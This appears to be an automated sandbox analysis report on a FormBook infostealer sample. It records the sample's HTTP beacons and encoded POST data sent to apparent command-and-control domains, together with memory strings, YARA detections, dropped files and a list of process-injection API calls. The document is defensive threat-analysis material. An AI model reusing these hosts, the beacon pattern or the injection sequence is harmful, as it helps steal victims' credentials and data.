          Source: global trafficHTTP traffic detected: GET /k8b/?8pMx8v9p=vAYaSr9qvHk7KCO7uWDlCoh8YGLtM5zRcLRoyBCgnX/aO/BnpSe24HN21iT/EXq7SkdF&Gzux=Wb2pdLjh7 HTTP/1.1Host: www.camdio.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.mensajera-radio.online
          Source: unknownHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.mensajera-radio.onlineConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.mensajera-radio.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mensajera-radio.online/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 4d 78 38 76 39 70 3d 61 2d 33 47 57 5a 6d 64 52 59 4e 74 37 79 58 50 41 66 45 75 59 66 4f 74 62 58 53 42 46 67 61 69 37 73 6b 62 76 7a 63 67 6c 30 4c 41 34 38 4e 68 4c 64 74 64 6b 67 32 6e 73 75 64 73 71 53 61 6a 6a 58 41 76 48 4c 28 6a 74 44 79 6b 37 61 52 5f 54 6e 57 33 39 49 78 33 6a 30 68 44 6f 6e 4f 57 7e 49 66 4a 64 31 78 4f 66 64 77 74 79 7a 70 6f 67 46 42 4d 4d 45 67 48 75 58 45 45 72 39 38 74 64 34 6c 63 55 41 69 42 4a 2d 43 41 52 32 78 51 6b 79 65 41 64 63 7e 57 33 49 77 7a 41 38 4c 57 56 6a 41 72 42 41 34 69 62 48 53 43 45 33 72 6a 6c 70 67 51 6f 5a 65 6a 70 47 59 58 69 52 69 37 66 38 4d 41 78 51 79 6f 44 6c 78 44 72 39 7a 56 41 7a 70 66 78 35 33 33 68 66 35 78 5a 79 48 2d 4a 55 53 79 62 58 4a 43 79 31 30 50 45 72 71 4c 62 72 4e 30 74 7a 77 6e 6b 57 72 53 7e 48 37 36 46 4a 57 47 76 6d 39 6e 45 32 73 33 74 7a 6c 6a 59 30 4a 51 4b 36 4d 68 66 70 73 79 32 4b 33 4f 70 7a 70 31 46 4f 6e 33 7a 72 39 41 56 30 28 65 35 64 72 6a 42 75 35 5f 57 30 63 5f 52 4e 58 6f 47 64 6c 74 46 67 38 61 6a 38 65 66 54 75 6e 66 75 49 79 75 30 66 78 42 50 78 76 7a 45 41 4b 71 68 71 6c 63 78 2d 28 46 47 66 4a 69 34 39 67 36 49 5f 53 50 6b 46 67 71 79 5f 59 4e 4a 4a 4f 34 77 30 48 37 6b 72 38 6d 35 66 56 62 78 6b 59 30 59 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 8pMx8v9p=a-3GWZmdRYNt7yXPAfEuYfOtbXSBFgai7skbvzcgl0LA48NhLdtdkg2nsudsqSajjXAvHL(jtDyk7aR_TnW39Ix3j0hDonOW~IfJd1xOfdwtyzpogFBMMEgHuXEEr98td4lcUAiBJ-CAR2xQkyeAdc~W3IwzA8LWVjArBA4ibHSCE3rjlpgQoZejpGYXiRi7f8MAxQyoDlxDr9zVAzpfx533hf5xZyH-JUSybXJCy10PErqLbrN0tzwnkWrS~H76FJWGvm9nE2s3tzljY0JQK6Mhfpsy2K3Opzp1FOn3zr9AV0(e5drjBu5_W0c_RNXoGdltFg8aj8efTunfuIyu0fxBPxvzEAKqhqlcx-(FGfJi49g6I_SPkFgqy_YNJJO4w0H7kr8m5fVbxkY0Yw).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 12 Sep 2020 13:00:22 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 327Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6b 38 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /k8b/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: explorer.exe, 00000004.00000003.548939099.0000000007E63000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000003.356903689.0000000004BBC000.00000004.00000001.sdmpString found in binary or memory: http://en.ws
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000004.00000003.548939099.0000000007E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.mioft.com/win/2004/08/events/e
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378004309.0000000004A80000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/DataSet1.xsd
          Source: explorer.exe, 00000004.00000000.379746534.0000000002280000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000003.357829186.0000000004BBF000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.395898665.0000000007C99000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: cmd.exe, 0000000D.00000002.621853417.00000000034A9000.00000004.00000001.sdmpString found in binary or memory: http://www.camdio.xyz
          Source: cmd.exe, 0000000D.00000002.621853417.00000000034A9000.00000004.00000001.sdmpString found in binary or memory: http://www.camdio.xyz/k8b/
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000003.359230035.0000000004BCB000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersP
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000003.362113660.0000000004BC7000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersS
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000003.359095944.0000000004BCB000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersd
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378047605.0000000004BB0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomf6
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378047605.0000000004BB0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coml1
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000003.357463705.0000000004BEE000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000003.357481879.0000000004BBC000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnd
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000003.360449526.0000000004BC7000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm/EN
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000003.357880495.0000000004BBF000.00000004.00000001.sdmpString found in binary or memory: http://www.microsoftEl.
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000003.356332227.0000000004BCB000.00000004.00000001.sdmp, uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: cmd.exe, 0000000D.00000002.620653930.00000000029B1000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: cmd.exe, 0000000D.00000002.620683412.00000000029C8000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: cmd.exe, 0000000D.00000002.620683412.00000000029C8000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
          Source: cmd.exe, 0000000D.00000002.620653930.00000000029B1000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: cmd.exe, 0000000D.00000002.619133496.00000000004F8000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfken&display=windesktop&theme=win7&lc=1033&redirect_uri=htt
          Source: cmd.exe, 0000000D.00000002.620653930.00000000029B1000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
          Source: cmd.exe, 0000000D.00000002.620653930.00000000029B1000.00000004.00000001.sdmp, cmd.exe, 0000000D.00000002.620683412.00000000029C8000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
          Source: cmd.exe, 0000000D.00000002.620683412.00000000029C8000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.375722005.000000000084A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.430665335.0000000001CA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.426364179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.620844843.0000000002C20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.619161328.0000000000500000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.430642110.0000000001C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\cmd.exeDropped file: C:\Users\user\AppData\Roaming\L6725004\L67logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\cmd.exeDropped file: C:\Users\user\AppData\Roaming\L6725004\L67logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.430665335.0000000001CA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.430665335.0000000001CA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.426364179.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.426364179.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.620844843.0000000002C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.620844843.0000000002C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.619161328.0000000000500000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.619161328.0000000000500000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.430642110.0000000001C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.430642110.0000000001C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_04A60BEE NtQuerySystemInformation,0_2_04A60BEE
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_04A60BB3 NtQuerySystemInformation,0_2_04A60BB3
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_00419C90 NtCreateFile,3_2_00419C90
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_00419D40 NtReadFile,3_2_00419D40
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_00419DC0 NtClose,3_2_00419DC0
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_00419E70 NtAllocateVirtualMemory,3_2_00419E70
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_00419D3A NtReadFile,3_2_00419D3A
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A99A0 NtCreateSection,LdrInitializeThunk,3_2_019A99A0
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_019A9910
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_019A98F0
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9840 NtDelayExecution,LdrInitializeThunk,3_2_019A9840
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_019A9860
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_019A9A00
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9A20 NtResumeThread,LdrInitializeThunk,3_2_019A9A20
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9A50 NtCreateFile,LdrInitializeThunk,3_2_019A9A50
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A95D0 NtClose,LdrInitializeThunk,3_2_019A95D0
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9540 NtReadFile,LdrInitializeThunk,3_2_019A9540
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9780 NtMapViewOfSection,LdrInitializeThunk,3_2_019A9780
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_019A97A0
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9710 NtQueryInformationToken,LdrInitializeThunk,3_2_019A9710
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_019A96E0
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_019A9660
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A99D0 NtCreateProcessEx,3_2_019A99D0
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9950 NtQueueApcThread,3_2_019A9950
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A98A0 NtWriteVirtualMemory,3_2_019A98A0
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9820 NtEnumerateKey,3_2_019A9820
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019AB040 NtSuspendThread,3_2_019AB040
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019AA3B0 NtGetContextThread,3_2_019AA3B0
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9B00 NtSetValueKey,3_2_019A9B00
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9A80 NtOpenDirectoryObject,3_2_019A9A80
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9A10 NtQuerySection,3_2_019A9A10
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A95F0 NtQueryInformationFile,3_2_019A95F0
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019AAD30 NtSetContextThread,3_2_019AAD30
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9520 NtWaitForSingleObject,3_2_019A9520
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9560 NtWriteFile,3_2_019A9560
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9FE0 NtCreateMutant,3_2_019A9FE0
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019AA710 NtOpenProcessToken,3_2_019AA710
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9730 NtQueryVirtualMemory,3_2_019A9730
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019AA770 NtOpenThread,3_2_019AA770
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9770 NtSetInformationFile,3_2_019A9770
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9760 NtOpenProcess,3_2_019A9760
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A96D0 NtCreateKey,3_2_019A96D0
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9610 NtEnumerateValueKey,3_2_019A9610
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9650 NtQueryValueKey,3_2_019A9650
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019A9670 NtQueryInformationProcess,3_2_019A9670
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39A50 NtCreateFile,LdrInitializeThunk,13_2_02E39A50
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39860 NtQuerySystemInformation,LdrInitializeThunk,13_2_02E39860
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39840 NtDelayExecution,LdrInitializeThunk,13_2_02E39840
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E399A0 NtCreateSection,LdrInitializeThunk,13_2_02E399A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39910 NtAdjustPrivilegesToken,LdrInitializeThunk,13_2_02E39910
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E396E0 NtFreeVirtualMemory,LdrInitializeThunk,13_2_02E396E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E396D0 NtCreateKey,LdrInitializeThunk,13_2_02E396D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39FE0 NtCreateMutant,LdrInitializeThunk,13_2_02E39FE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39780 NtMapViewOfSection,LdrInitializeThunk,13_2_02E39780
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39770 NtSetInformationFile,LdrInitializeThunk,13_2_02E39770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39710 NtQueryInformationToken,LdrInitializeThunk,13_2_02E39710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E395D0 NtClose,LdrInitializeThunk,13_2_02E395D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39560 NtWriteFile,LdrInitializeThunk,13_2_02E39560
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39540 NtReadFile,LdrInitializeThunk,13_2_02E39540
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39A80 NtOpenDirectoryObject,13_2_02E39A80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39A20 NtResumeThread,13_2_02E39A20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39A00 NtProtectVirtualMemory,13_2_02E39A00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39A10 NtQuerySection,13_2_02E39A10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E3A3B0 NtGetContextThread,13_2_02E3A3B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39B00 NtSetValueKey,13_2_02E39B00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E398F0 NtReadVirtualMemory,13_2_02E398F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E398A0 NtWriteVirtualMemory,13_2_02E398A0
